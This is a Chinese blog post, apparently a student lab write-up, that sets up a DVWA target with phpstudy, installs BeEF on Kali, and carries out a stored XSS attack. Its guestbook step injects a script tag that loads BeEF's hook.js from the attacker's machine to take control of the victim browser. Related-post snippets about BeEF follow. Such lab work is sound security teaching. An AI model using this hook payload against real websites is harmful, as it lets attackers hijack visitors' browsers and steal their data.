利用BeEF 执行 XSS 攻击

已于 2023-06-26 16:52:02 修改
阅读量60 收藏
点赞数
文章标签: php 开发语言
于 2023-06-26 16:50:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hdvsns/article/details/131401091
版权

  配置靶机环境

1.登录win7靶机

2.访问https://www.xp.cn/,下载phpstudy软件(下载最新版的就可以),phpstudy软件可以用来进行站点搭建。

3.解压后开始安装phpstudy

4.点击启动Apache服务与MySQL服务进行测试

5.在浏览器访问127.0.0.1或者localhost,出现“站点创建成功”,则phpstudy安装成功

6.访问https://github.com/ethicalhack3r/DVWA,下载压缩包

7.将解压后的DVWA文件夹放到phpstudy安装目录下

8.进入DVWA文件夹,将文件config.inc.php.dist复制为一个副本,将副本修改为config.inc.php,双击从记事本里面打开。

9.打开config.inc.php文件后,将文件中的db_user db_password,分别修改为root,root

10.保持phpstudy开启状态,在浏览器中输入网址:http://127.0.0.1/DVWA-master,进入配置安装界面,点击Setup/Reset DB。

11.第一次安装可能在方框内会出现标红,下面依次解决:

(1)打开dvwa下面的config.inc.php文件,在文件里面找到这两串代码

将这两串key输入进去
public:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
private:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K

12.在phpstudy的安装目录中,找到php.ini文件,打开它

13.将allow_url_fopen和allow_url_include的值改为On

14.最后重启一下phpstudy中的Apache与mysql服务,再次访问http://127.0.0.1/DVWA-maste中的设置,你可以发现都正常了,可能会跳转到登陆页面,那就说明安装成功,输入账号和密码:DVWA的默认账号和默认密码分别是:admin 和 password

     

      7.5.3 BeEF安装

       在kali中可使用 apt-get install beef-xss 命令来安装BeEF,


 

7.5.2  利用BeEF 执行 XSS 攻击案例

(1)从BeEF 安装目录中启动它(注意:新的 BeEF 启动前会强制新用户设定密码,可以在终端设立为:123456,或者可以在配置文件 “/usr/share/beef-xss/config.yaml”或"/etc/beef-xss/config.yaml"修改默认账号密码!)

cd /usr/share/beef-xss/

./beef

(2)浏览器打开http://127.0.0.1:3000/ui/panel,使用账户名和密码登录:

(3)将win7靶机中的DWVA难度调为low

(4)在XSS(Stored)下输入脚本命令
Name:ceshi(自己取一个名字)
Message:<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>

(5)点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了

 (类似BEEF的工具,先生成“钩子”(恶意文件),通过发邮件或者恶意网页的方式,将钩子放入靶机,靶机一旦执行,就会上钩)

计算机网络技术2班钟少杰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1058
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
linux-kali利用BeEF 执行 XSS 攻击
LCH14777475118的博客
06-26 311
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 503
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击
利用 BeEF 执行 XSS 攻击
xiaoma920的博客
05-28 537
跨站脚本攻击XSS),是一种网站应用程序的安全漏洞攻击,属于代码注入的一种。与其他攻击相比,XSS 攻击所带来的危害更大。XSS 攻击是最普遍的 Web 应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1148
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
跨站脚本攻击--利用BeEF 执行 XSS 攻击
weixin_69826880的博客
06-26 639
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。靶场:kali(攻击者),32位win7(被攻击者)攻击环境:kali安装BEEF,32位win7站点搭建BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。
利用BeEF 执行 XSS 攻击。计算机网络技术二班,阿布都艾尼。
m0_64091527的博客
06-25 124
总之,BeEF是一个非常重要的工具,它不仅能够用于安全测试,在恶意攻击中,也有着重要的应用,可以帮助攻击者完成一些关键性质的操作。BeEF服务器是攻击者的机器,它是BeEF的核心,并通过web界面进行控制和管理。3.加强Web应用安全防范,并使用合适的加密方式: 通过加强Web应用的安全性设置,防范XSS攻击,使用合适的加密方式能够减少BeEF工具对用户造成的危害。2.合法且道德地使用BeEF: 利用BeEF工具进行网络攻击属于违法行为,使用BeEF需要遵守相关的法律法规,且只能在道德合理的情况下使用。
【安全系列】beef-xss攻击示例
叁滴水 的博客
08-09 5005
beef-xss说明 BeEF是“浏览器开发框架”的缩写。它是一个专注于Web浏览器的渗透测试工具。 ​BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击。 1.安装beef-xss apt-get install beef-xss Setting
Beef-Xss 浏览器攻击框架的使用
XXokok的博客
10-01 604
Beef-Xss 浏览器攻击框架的使用,如果导致目标引入了外部JS文件,则会沦为“肉鸡”
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
XSS攻击通常分为反射型、存储型和DOM型三种类型,而JavaScript是实现这些攻击的关键工具,因为它可以动态修改网页内容,执行恶意操作。 实验内容主要分为两个部分:安装Beef-xss工具和在实际网站上进行XSS攻击。...
网络渗透测试 XSS和SQL注入
12-02
XSS攻击攻击者通过在网页中插入恶意的HTML代码,利用用户信任的网站来窃取个人信息或执行有害操作。这种攻击分为三种类型:反射型XSS、存储型XSS和DOM-Based XSS。反射型XSS是通过诱使用户点击含有恶意脚本的链接...
网络渗透实验三.docx
01-10
* 了解 XSS 攻击的基本原理:XSS 攻击是指攻击者 inject 恶意脚本到网站上,使得用户访问网站时,恶意脚本被执行,从而达到攻击者的目的。 * 了解防御 XSS 攻击的方法:包括输入验证、输出编码、Content Security ...
网络安全考题,面试题-含答案.pdf
02-06
- 漏洞利用:通过工具如sqlmap、Beef-XSS、Brup和文件上传漏洞来获取Webshell。 - 权限提升:如MySQL提权、Windows溢出提权和Linux内核漏洞提权(如脏牛漏洞)。 - 日志清理:清除活动痕迹,避免被追踪。 - 总结...
PHP商城案例
最新发布
王世凡的技术博客
07-26 298
http://www.e9933.com/
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 859
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 656
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1051
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
xss攻击 beef
09-06
XSS攻击是一种跨站脚本攻击,它利用网页应用程序对用户输入的信任来注入恶意的客户端脚本。而beef则是一种用于进行XSS攻击的平台。beef-xssbeef平台的一部分,它允许攻击者在受害者的浏览器中执行恶意代码。 使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值